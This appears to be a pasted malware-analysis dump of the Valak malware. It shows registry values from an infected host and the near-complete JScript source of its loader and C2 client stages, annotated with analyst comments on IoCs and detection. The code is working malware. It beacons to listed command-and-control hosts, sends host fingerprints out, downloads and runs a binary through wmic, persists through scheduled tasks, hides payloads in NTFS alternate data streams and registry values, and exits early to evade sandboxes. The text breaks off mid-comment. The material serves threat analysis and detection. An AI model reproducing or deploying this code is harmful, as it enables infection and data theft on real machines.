G0dR4p3

Valak_config_new

Jun 14th, 2020
  1. #Valak #Config #New
  2. Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer
  3. Class Name: <NO CLASS>
  4. Last Write Time: 6/3/2020 - 10:49 PM
  5.  
  6. Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer\Appsw64
  7. Class Name: <NO CLASS>
  8. Last Write Time: 6/3/2020 - 10:49 PM
  9. Value 0
  10. Name: ShimV4
  11. Type: REG_SZ
  12. Data: http://a-zcorner.com
  13.  
  14. Value 1
  15. Name: SetupServiceKey
  16. Type: REG_SZ
  17. Data: 79e5036f32
  18.  
  19. Value 2
  20. Name: ServerUrl
  21. Type: REG_SZ
  // Analyst note: JScript C2 client recovered from the "ServerUrl" registry value. Loader.Persist
  // (in the WebLib32 value below) writes this same content to C:\Users\Public\Disk0.js, and the
  // "Disk Diagnostics" scheduled task created there relaunches it every 6 minutes.
  22. Data: var client_config = {
  // Beacon hosts tried in order by Client.GetTask; treat each as a network IoC.
  23. COMMAND_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  24. SOFT_SIG : 'mad29',
  25. CLIENT_ID : '7EF8C89EC08D346C7D45FC7994D29D96', // not referenced by the client code on this page
  26. C2_REQUEST_SLEEP : 20, // seconds slept between C2 hosts in Client.GetTask
  27. C2_FAIL_SLEEP : 1, // not referenced by the client code on this page
  28. C2_FAIL_COUNT : 3, // not referenced by the client code on this page
  29. C2_OB_KEY : 'JxTRG4mY', // appended to nonce / uid before DataTools.DeriveKey; seeds the XOR "encryption"
  30. SOFT_VERSION : 32,
  31.  
  32. C2_COMMAND_PREFIX : 'api.aspx', // path of the tasking endpoint built by Client.GetWorkerEndpoint
  33.  
  34. C2_USE_IEXPLORE : false // not referenced by the client code on this page
  35. }
  36.  
  // Defined here so that the eval()'d WebLib32 loader skips its own entry point: its last statement
  // only calls Loader.DeployClient() when CLIENT_IMPORT_ENV is undefined.
  37. var CLIENT_IMPORT_ENV = true;
  38.  
  39. var Client = {};
  // WScript.Shell is used only for RegRead in this stage; all other shell work goes through the
  // Windows object exported by the loader.
  40. Client.CoMainObject = new ActiveXObject('WScript.Shell');
  // Returns the raw JScript source of the second stage stored in
  // HKCU\Software\ApplicationContainer\Appsw64\WebLib32 (registry-resident code; the "Value 3"
  // dump below shows its contents). Detection angle: script hosts reading a large REG_SZ under this key.
  41. Client.LoadLibraryReg = function(){
  42. return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
  43. }
  44.  
  // eval()s the registry-stored loader and then binds the globals it defines (Windows, GlobalStrings,
  // DataTools, ObjectProducer, Http, Loader, debug) onto Client. Nothing in this stage touches disk;
  // the code executed here never exists as a file, which is the evasion property an analyst should
  // note when hunting (hunt the registry value, not a script path).
  45. Client.LibraryLoadContext = function(){
  46. eval(Client.LoadLibraryReg());
  47. Client.Windows = Windows;
  48. Client.GlobalStrings = GlobalStrings;
  49. Client.DataTools = DataTools;
  50. Client.ObjectProducer = ObjectProducer;
  51. Client.Http = Http;
  52. Client.Loader = Loader;
  53. Client.debug = debug;
  54.  
  55. }
  56.  
  57.  
  // Builds the tasking URL path: api.aspx?dx11diag=<uid>&apikey=<2 random chars>&g=<nonce>&selected=2.
  // The uid is XORed with DeriveKey(nonce + C2_OB_KEY), base64-encoded and URL-encoded; because the
  // nonce is sent in clear as "g", the encoding is reversible by anyone holding C2_OB_KEY.
  // Returns the path without host; Client.GetTask prefixes each COMMAND_C2 entry.
  58. Client.GetWorkerEndpoint = function(){
  59. var nonce = Client.DataTools.Random.String(12);
  60. var uid = Client.Loader.GetUid();
  61.  
  62. var sessionKey = nonce + client_config.C2_OB_KEY;
  63.  
  // RotString only declares two parameters; the trailing 0 is ignored.
  64. var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
  65. encodedId = Base64Encode(encodedId);
  66. encodedId = encodeURIComponent(encodedId);
  67.  
  // Parameter names mimic benign telemetry; useful as a URI signature for proxy/IDS rules.
  68. return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&apikey=" + Client.DataTools.Random.String(2) + "&g=" + nonce + "&selected=2";
  69. }
  70.  
  71.  
  // Schedules a one-shot task (schtasks /SC Once) named "SoundIndex_<taskName>" that runs
  // `wmic process call create "C:\Users\Public\diskdiag.ini:<taskName>"` about a minute from now.
  // The payload itself is written into that NTFS alternate data stream by Client.GetTask.
  // Detection angle: schtasks.exe and wmic.exe spawned by a script host, and a /TR pointing at an
  // ADS (path containing ':' after the file name).
  72. Client.PrepareExectionTask = function(taskName){
  73. var currentTime = new Date(),
  74. hours = currentTime.getHours(),
  75. minutes = currentTime.getMinutes();
  76.  
  // Zero-pads to HH:MM for /ST. Note the condition tests minutes+3 while the value uses minutes+1;
  // the scheduled time is the current minute plus one (minutes >= 59 are not wrapped).
  77. hours = hours < 10 ? "0" + hours.toString() : hours;
  78. minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
  79. var time = hours + ":" + minutes;
  80.  
  81. var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
  82. var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
  83. var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))
  84.  
  85. Client.Windows.Execute(taskCommand);
  86. }
  87.  
  // Runs `wmic process call create "%temp%\<uid>.bin <pluginId>"`. The .bin is the binary
  // downloaded by Loader.DeployHost from /go.aspx; pluginId is passed verbatim from the C2 response.
  // Detection angle: wmic.exe launching an executable with a .bin extension from %temp%.
  88. Client.ExecutePlugin = function(pluginId){
  89. var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
  90. var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));
  91.  
  92. Client.Windows.Execute(command);
  93.  
  94. }
  95.  
  96.  
  // Single pass over COMMAND_C2: GET <host>/<GetWorkerEndpoint()>, XOR-decode the body with
  // DeriveKey(uid + C2_OB_KEY), and dispatch on the marker it contains:
  //   "--TASK--<base64>--<name>"  -> write decoded bytes to diskdiag.ini:<name> and schedule it
  //   "--PLUGIN--<id>"            -> run the already-dropped %temp%\<uid>.bin with <id>
  // Returns after the first task; an empty/unknown response sleeps C2_REQUEST_SLEEP seconds and
  // moves to the next host. Re-polling comes from the 6-minute scheduled task, not a loop here.
  97. Client.GetTask = function(){
  98. for(var i = 0; i < client_config.COMMAND_C2.length; i++){
  99. var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
  100. response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));
  101.  
  102. if(response.indexOf("--TASK") !== -1){
  // split('--')[1] is the base64 payload, [2] the ADS/task name chosen by the operator.
  103. var executionTask = response.replace('--TASK--', '').split('--')[1];
  104. var taskName = response.split('--')[2];
  105.  
  // Task is scheduled before the stream is written; ordering relies on the ~1 minute /ST delay.
  106. Client.PrepareExectionTask(taskName);
  107. Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
  108. return;
  109. }
  110.  
  111. if(response.indexOf('--PLUGIN') !== -1){
  112. var plugin = response.replace('--PLUGIN--', '');
  113. Client.ExecutePlugin(plugin);
  114. return;
  115. }
  116.  
  117. WScript.Sleep(client_config.C2_REQUEST_SLEEP * 1000);
  118. }
  119. }
  120.  
  121.  
  122.  
  // Decodes a base64 string into binary via the MSXML "bin.base64" dataType and returns an OPEN
  // ADODB.Stream (Type 1 = binary) positioned at the end. Callers (Windows.WriteBytes /
  // WriteDataStreamBytes) call SaveToFile and Close on it. Classic LOLBin pattern for writing
  // arbitrary bytes from script without a PE-aware API.
  123. function Base64bytes(string){
  124. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  125. var element = XmlDOM.createElement("Base64Data");
  126. element.dataType = "bin.base64";
  127.  
  128. element.text = string;
  129.  
  130. var stream = WScript.CreateObject("ADODB.Stream");
  131. stream.Type = 1;
  132. stream.Open();
  133.  
  134. stream.Write(element.nodeTypedValue);
  135. return stream;
  136. }
  137.  
  138.  
  // Converts a JScript string to a byte array by writing it as ASCII text into an ADODB.Stream
  // and re-reading the stream in binary mode. Feeds Base64Encode; the ASCII charset means the
  // XOR output of RotString is truncated to 7-bit on the wire — TODO confirm on a live sample.
  139. function StringToBinary(string){
  140. var BinaryStream = new ActiveXObject("ADODB.Stream");
  141. BinaryStream.Type = 2;
  142. BinaryStream.CharSet = "ascii";
  143. BinaryStream.Open();
  144. BinaryStream.WriteText(string);
  145. BinaryStream.Position = 0;
  146. BinaryStream.Type = 1;
  147. BinaryStream.Position = 0;
  148. return BinaryStream.Read();
  149. }
  150.  
  151.  
  // Base64-encodes a string using MSXML's bin.base64 dataType. Line breaks inserted by MSXML are
  // stripped, and so is every literal "//" — the latter alters the encoding and is presumably
  // compensated server-side; keep it in mind when replaying beacons in a lab.
  152. function Base64Encode(string) {
  153.  
  154. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  155. var element = XmlDOM.createElement("Base64Data");
  156. element.dataType = "bin.base64";
  157.  
  158. element.nodeTypedValue = StringToBinary(string);
  159.  
  160. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  161. }
  162.  
  // Entry sequence of the client stage: pull and eval the loader from the registry, idle for one
  // minute (likely a simple sandbox/timeout delay — confirm), then poll the C2 list once.
  163. Client.LibraryLoadContext();
  164.  
  165. WScript.Sleep(1 * 60 * 1000);
  166.  
  167. Client.GetTask();
  168.  
  169. Value 3
  170. Name: WebLib32
  171. Type: REG_SZ
  // Analyst note: first-stage loader stored in the "WebLib32" registry value (Loader.Persist copies
  // its own script file here). The dump repeats this source several times; only the first copy
  // needs analysis. Same C2 list and obfuscation key as the client stage above.
  172. Data: var config = {
  173. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  174. SOFT_SIG : 'mad29', // campaign/build tag sent in the check-in
  175. SOFT_VERSION: 32,
  176. C2_REQUEST_SLEEP : 21, // seconds between check-in attempts in Loader.DeployClient
  177. C2_FAIL_SLEEP : 21, // not referenced by the loader code on this page
  178. C2_FAIL_COUNT : 20, // outer retry count in Loader.DeployClient
  179. C2_OB_KEY : 'JxTRG4mY', // appended to nonce / uid before DataTools.DeriveKey
  180.  
  181.  
  182. C2_PREFIX : 'rpc.aspx' // check-in endpoint path (Loader.GetInitialEndpoint)
  183. }
  184.  
  185.  
  // Defaults to the first host; overwritten with the responding host in Loader.DeployClient and
  // persisted to the "ShimV4" value (see Value 0 of this key: http://a-zcorner.com).
  186. var SELECTED_C2 = config.PRIMARY_C2[0];
  187.  
  188.  
  // 32-bit integer multiply shim, presumably because the legacy WSH JScript engine lacks Math.imul.
  // Needed by DataTools.Hash, which derives the victim "uid".
  189. Math.imul = function (a, b) {
  190. var ah = (a >>> 16) & 0xffff;
  191. var al = a & 0xffff;
  192. var bh = (b >>> 16) & 0xffff;
  193. var bl = b & 0xffff;
  194. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  195. };
  196.  
  197.  
  // Host IoC table: registry root, LOLBin command templates (%name%-style placeholders filled by
  // DataTools.Strings.ParseTemplate), drop paths and the persistence task name.
  198. var GlobalStrings = {
  199. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\", // all RegWrite calls land under here
  200. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"", // plugin launch (client stage)
  201. WMIC_EXEC : "wmic process call create \"%path%\"", // ADS task launch (client stage)
  202. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  203. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  204. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini", // decoy file whose alternate data streams hold payloads
  205. ADS_SSID : "HDDScan", // not referenced by the code on this page
  206. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js", // explorer.exe is used as the launcher for the dropped client
  207. TASK_NAME : "Disk Diagnostics" // recurring task created by Loader.Persist
  208. }
  209.  
  210.  
  // Thin ActiveXObject factory keyed by symbolic name; indirection through GetRootConstructor keeps
  // the ProgID strings out of direct `new ActiveXObject(...)` expressions.
  211. var ObjectProducer = {}
  212. ObjectProducer.AccesibleObjects = {
  213. MAIN_SH_OBJECT : 'WScript.Shell',
  214. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  215. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  216. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  217. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  218. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  219. };
  220.  
  221. ObjectProducer.GetRootConstructor = function(){
  222. return ActiveXObject;
  223. }
  224.  
  // Returns `new ActiveXObject(<ProgID for instanceKey>)`; an unknown key passes undefined through.
  225. ObjectProducer.GetInstance = function(instanceKey){
  226. var rootConstructor = ObjectProducer.GetRootConstructor();
  227. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  228. }
  229.  
  230.  
  231.  
  // Encoding/"crypto" helpers. Nothing here is cryptographically meaningful: traffic is protected
  // only by a single-byte XOR whose key is derivable from values sent in the clear plus the
  // hard-coded C2_OB_KEY, so captured beacons can be decoded offline.
  232. var DataTools = {};
  233. DataTools.KEY_BASE = 1029;
  234.  
  // Folds keyStr into KEY_BASE by XOR, then returns the sum of the decimal digits of the result.
  // The output is a small integer (digit sum), hence the weak XOR key used by RotString.
  235. DataTools.DeriveKey = function(keyStr){
  236. var keyBase = DataTools.KEY_BASE;
  237. var key = 0;
  238.  
  239. for(var i = 0; i < keyStr.length; i++){
  240. keyBase = keyBase ^ keyStr.charCodeAt(i);
  241. }
  242.  
  243. var _keyBase = keyBase.toString();
  244. for(var i = 0; i < _keyBase.length; i++){
  245. key += parseInt(_keyBase.charAt(i));
  246. }
  247.  
  248. return key;
  249. }
  250.  
  // Despite the name this is not a rotation: every char code is XORed with the same integer key.
  // Symmetric, so the same call both encodes requests and decodes responses.
  251. DataTools.RotString = function(str, key){
  252. var rotd = "";
  253. for(var i = 0; i < str.length; i++){
  254. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  255. }
  256.  
  257. return rotd;
  258. }
  259.  
  // Multiply-XOR string hash (seed 0xdeadbeef, multiplier 2654435761) returned as lowercase hex.
  // Loader.GetUid hashes the host fingerprint with it; the first 8 hex chars of the
  // "SetupServiceKey" value in this dump (79e5036f32 minus the trailing version "32") are such a hash.
  260. DataTools.Hash = function(str){
  261. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  262. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  263.  
  264. return ((h ^ h >>> 16) >>> 0).toString(16);
  265. }
  266.  
  267. DataTools.Random = {};
  // Uniform integer in [min, max] via Math.random — nonces and URL padding only, not security-relevant.
  268. DataTools.Random.Number = function(min, max){
  269. min = Math.ceil(min);
  270. max = Math.floor(max);
  271. return Math.floor(Math.random() * (max - min + 1)) + min;
  272. }
  273.  
  // Random lowercase [a-z] string of the given length; used for nonces, decoy query parameters and
  // the 1024-char filler written into diskdiag.ini.
  274. DataTools.Random.String = function(len){
  275. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  276. var result = "";
  277. for(var i = 0; i < len; i++){
  278. var chr = DataTools.Random.Number(0, alphabet.length-1);
  279. result = result.concat(alphabet.charAt(chr));
  280. }
  281.  
  282. return result;
  283. }
  284.  
  285.  
  286. DataTools.Strings = {};
  // Fills %key% placeholders in str from a "k1=v1&k2=v2" template string. String.replace with a
  // string pattern substitutes only the first occurrence of each placeholder.
  287. DataTools.Strings.ParseTemplate = function(str, templateStr){
  288. var template = templateStr.split('&');
  289. for(var i = 0; i < template.length; i++){
  290. var keyValue = template[i].split('=');
  291. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  292. }
  293.  
  294. return str;
  295. }
  296.  
  // OS interaction layer over WScript.Shell, Scripting.FileSystemObject and WMI. Every command
  // executed by the malware goes through Windows.Execute (WScript.Shell.Run), which is the
  // process-creation event to look for: wscript/explorer -> schtasks.exe / wmic.exe.
  297. var Windows = {};
  298. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  299. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  300.  
  // Runs a command line via WScript.Shell.Run (default window style, no wait).
  301. Windows.Execute = function(command){
  302. Windows.CoMainObject.Run(command);
  303. }
  304.  
  // Expands %VAR% environment references.
  305. Windows.GetEnv = function(env){
  306. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  307. }
  308.  
  309. Windows.RegRead = function(path){
  310. return Windows.CoMainObject.RegRead(path);
  311. }
  312.  
  // All writes are scoped under GlobalStrings.REG_ROOT (HKCU\...\ApplicationContainer\Appsw64\).
  // Value creation under this key is the primary registry IoC for this sample.
  313. Windows.RegWrite = function(entry, value){
  314. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  315. }
  316.  
  // Creates/overwrites a text file filled with 1024 random letters — a decoy body so the file that
  // carries the payload ADS (diskdiag.ini) is not empty.
  317. Windows.CreateFile = function(path){
  318. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  319. fHandle.WriteLine(DataTools.Random.String(1024));
  320. fHandle.Close();
  321. }
  322.  
  // Writes text into the NTFS alternate data stream path:stream. Not referenced on this page.
  323. Windows.AppendDataStream = function(path, stream, data){
  324. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  325. fHandle.WriteLine(data);
  326. fHandle.Close();
  327. }
  328.  
  // Saves an ADODB.Stream into an alternate data stream (SaveToFile mode 2 = overwrite). Identical
  // to WriteDataStreamBytes below; not referenced on this page.
  329. Windows.AppendDataStreamB = function(path, stream, data){
  330. data.SaveToFile(path.concat(":").concat(stream), 2);
  331. data.Close();
  332. }
  333.  
  // Writes text to a regular file; used by Loader.Persist to drop C:\Users\Public\Disk0.js.
  334. Windows.WriteData = function(path, data){
  335. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  336. fHandle.Write(data);
  337. fHandle.Close();
  338. }
  339.  
  // Saves an ADODB.Stream to disk and closes it; used for the %temp%\<uid>.bin download.
  340. Windows.WriteBytes = function(path, data){
  341. data.SaveToFile(path, 2);
  342. data.Close();
  343. }
  344.  
  // Saves an ADODB.Stream into path:stream (ADS) and closes it; used by the client stage for tasks.
  // Detection angle: file writes whose target path contains ':' after the file name.
  345. Windows.WriteDataStreamBytes = function(path, stream, data){
  346. data.SaveToFile(path.concat(":").concat(stream), 2);
  347. data.Close();
  348. }
  349.  
  // Reads a whole text file; used to copy the running script into the WebLib32 registry value.
  // The handle is not closed explicitly.
  350. Windows.ReadFile = function(path){
  351. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  352. return fHandle.ReadAll();
  353. }
  354.  
  // Connects to the WMI root\cimv2 namespace on pcname ("." = local) with impersonation.
  355. Windows.GetWMIProvider = function(pcname){
  356. return GetObject("winmgmts:"+
  357. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  358. }
  359.  
  // Returns SystemUpTime from Win32_PerfFormattedData_PerfOS_System, or 0 if WMI fails.
  // Loader.DeployClient compares it against 3000 and exits below that threshold.
  360. Windows.GetUptime = function(){
  361. try{
  362. var wmi = Windows.GetWMIProvider(".");
  363. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  364. var e = new Enumerator(queryResult);
  365.  
  366. return parseInt(e.item().SystemUpTime);
  367. }catch(e){
  368. return 0;
  369. }
  370. }
  371.  
  // Not an architecture probe despite the name: returns "32" only when ProductName contains
  // "Windows 7", otherwise "64". Sent to the C2 as the "rtag" parameter.
  372. Windows.GetArch = function(){
  373. var architecture = "64";
  374. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  375.  
  376. if(product.indexOf('Windows 7') != -1){
  377. architecture = "32";
  378. }
  379.  
  380. return architecture;
  381. }
  382.  
  383.  
  // Synchronous HTTP GET through a single shared MSXML2.XMLHTTP instance. Returns the body on
  // HTTP 200 and "" on any other status or exception, so callers never see failures directly.
  // No custom headers are set; the request carries the default MSXML User-Agent — TODO confirm
  // in a capture before writing a UA-based rule.
  384. var Http = {};
  385. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  386. Http.Request = function(url){
  387. try{
  388. Http.Client.Open('GET', url, false);
  389. Http.Client.Send();
  390.  
  391. if(Http.Client.Status == 200)
  392. return Http.Client.ResponseText;
  393. else
  394. return "";
  395. }catch(e){
  396. return ""
  397. }
  398. }
  399.  
  400.  
  // Host fingerprint and check-in construction. The fingerprint is collected once at load time.
  401. var Loader = {};
  402. Loader.USERNAME = Windows.GetEnv("%username%");
  403. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  404. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  405. Loader.Uptime = Windows.GetUptime();
  // "true" when the user domain differs from the computer name, i.e. a domain-joined host.
  406. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  407.  
  // Victim id: hex hash of the fingerprint plus build tag, with SOFT_VERSION appended as text.
  // Deterministic per host, so it doubles as the file name of the dropped binary and as the
  // "SetupServiceKey" registry value (79e5036f32 in this dump).
  408. Loader.GetUid = function(){
  409. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  410. }
  411.  
  // Builds the check-in blob: colon-joined username:pcname:domain:machinetype:uid:sig:version:uptime,
  // XORed with DeriveKey(nonce + C2_OB_KEY), base64-encoded, URL-encoded. The nonce travels in the
  // same URL ("ubwG"), so defenders holding C2_OB_KEY can decode captured check-ins.
  412. Loader.GetInitialRequest = function(nonce){
  413. var uid = Loader.GetUid();
  414. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  415.  
  416. var sessionKey = nonce + config.C2_OB_KEY;
  417. request = request.join(":");
  418. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  419. request = Base64Encode(request);
  420.  
  421. return encodeURIComponent(request);
  422. }
  423.  
  // Check-in path: /rpc.aspx?winrm=2387&view2=classic&regclid=<blob>&client=<31 random>&service_id=FE0<n>&ubwG=<nonce>.
  // The fixed tokens (winrm=2387, view2=classic, service_id=FE0, ubwG=) are good URI signature material.
  424. Loader.GetInitialEndpoint = function(){
  425. var nonce = DataTools.Random.String(12)
  426. var request = Loader.GetInitialRequest(nonce);
  427.  
  428. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  429. return endpoint;
  430. }
  431.  
  // Downloads the second-stage binary ("plugin host") from SELECTED_C2/go.aspx and writes it to
  // %temp%\<uid>.bin. The response is XOR-decoded with DeriveKey(uid + C2_OB_KEY) and then treated
  // as base64. Returns the dropped path. Host IoC: a .bin file in %temp% named by the 10-char uid.
  432. Loader.DeployHost = function(){
  433. var temp = Windows.GetEnv("%temp%");
  434. var architecture = Windows.GetArch();
  435. var nonce = DataTools.Random.String(12);
  436. var uid = Loader.GetUid();
  437. var sessionKey = nonce + config.C2_OB_KEY;
  438.  
  439. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  440. encodedId = Base64Encode(encodedId);
  441. encodedId = encodeURIComponent(encodedId);
  442.  
  // Fixed query tokens (goal=6E, e6_endpoint=29283291210281_2) are usable for URI detection.
  443. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  444. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  445.  
  446. var filename = uid.concat(".bin");
  447.  
  // An empty response (Http.Request returned "") still produces an empty .bin file here.
  448. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  449. return temp.concat("\\").concat(filename);
  450.  
  451. }
  452.  
  // Initial check-in loop, run only when the script executes standalone (CLIENT_IMPORT_ENV unset).
  // Exits immediately if WMI uptime is 3000 or less (or WMI failed, since GetUptime returns 0) —
  // presumably an anti-sandbox gate; a freshly booted analysis VM will therefore see no traffic.
  // Tries every PRIMARY_C2 host up to C2_FAIL_COUNT rounds; on a "<<<CLIENT__" reply it decodes the
  // client stage, records the host (ShimV4) and uid (SetupServiceKey) in the registry — matching
  // Value 0 and Value 1 of this dump — and hands off to Loader.Persist.
  453. Loader.DeployClient = function() {
  454. if (Loader.Uptime <= 3000) {
  455. WScript.Quit(0);
  456. }
  457.  
  458. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  459. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  460. try {
  461. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  462. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  463.  
  464. if (response.indexOf('<<<CLIENT__') !== -1) {
  465. var client = response.replace('<<<CLIENT__', '');
  466. client = Base64text(client);
  467.  
  468. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  469. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  470.  
  471. SELECTED_C2 = config.PRIMARY_C2[j];
  472. Loader.Persist(client);
  473. return;
  474.  
  475. }
  // Any exception (including inside Persist) is swallowed and the next host is tried.
  476. } catch (e) {
  477.  
  478. }
  479.  
  480. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  481. }
  482. }
  483. }
  484.  
  // Persistence and staging, in order:
  //   1. schtasks "Disk Diagnostics" running `explorer.exe C:\Users\Public\Disk0.js` every 6 minutes
  //   2. registry: ServerUrl = client stage source, WebLib32 = this script's own file contents
  //      (which is why the WebLib32 value dumped here contains this loader)
  //   3. decoy C:\Users\Public\diskdiag.ini, then the client dropped as C:\Users\Public\Disk0.js
  //   4. Loader.DeployHost downloads the plugin host binary
  // Cleanup checklist for responders: the task, the HKCU\...\Appsw64 key, both Public files and
  // their alternate data streams, and %temp%\<uid>.bin.
  485. Loader.Persist = function(client){
  486.  
  487. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  488. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  489.  
  490. Windows.Execute(taskCommand);
  491. Windows.RegWrite("ServerUrl", client);
  492. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  493.  
  494. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  495.  
  496. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  497.  
  498. Loader.DeployHost();
  499. }
  500.  
  // Developer leftover: shows a WScript.Shell popup. Not called anywhere on this page.
  501. function debug(message){
  502. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  503. }
  504.  
  505.  
  // Decodes a base64 string to UTF-8 text via MSXML bin.Base64 and an ADODB.Stream round trip
  // (binary write, then re-read as Type 2 text). Used to recover the client-stage source.
  506. function Base64text(string){
  507. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  508. var element = XmlDOM.createElement("tempContainer");
  509. element.dataType = "bin.Base64";
  510. element.text = string;
  511.  
  512. var stream = WScript.CreateObject("ADODB.Stream");
  513. stream.Type = 1;
  514. stream.Open();
  515. stream.Write(element.nodeTypedValue);
  516.  
  517. stream.Position = 0;
  518. stream.Type = 2;
  519. stream.CharSet = "utf-8";
  520.  
  // Stream is left open; the text is returned as-is.
  521. return stream.ReadText();
  522. }
  523.  
  // Converts a JScript string to a byte array: written as ASCII text into an ADODB.Stream, then
  // re-read in binary mode. Feeds Base64Encode. Same helper as in the client stage.
  524. function StringToBinary(string){
  525. var BinaryStream = new ActiveXObject("ADODB.Stream");
  526. BinaryStream.Type = 2;
  527. BinaryStream.CharSet = "ascii";
  528. BinaryStream.Open();
  529. BinaryStream.WriteText(string);
  530. BinaryStream.Position = 0;
  531. BinaryStream.Type = 1;
  532. BinaryStream.Position = 0;
  533. return BinaryStream.Read();
  534. }
  535.  
  536.  
  // Decodes base64 into an OPEN binary ADODB.Stream (Type 1); the caller (Windows.WriteBytes) calls
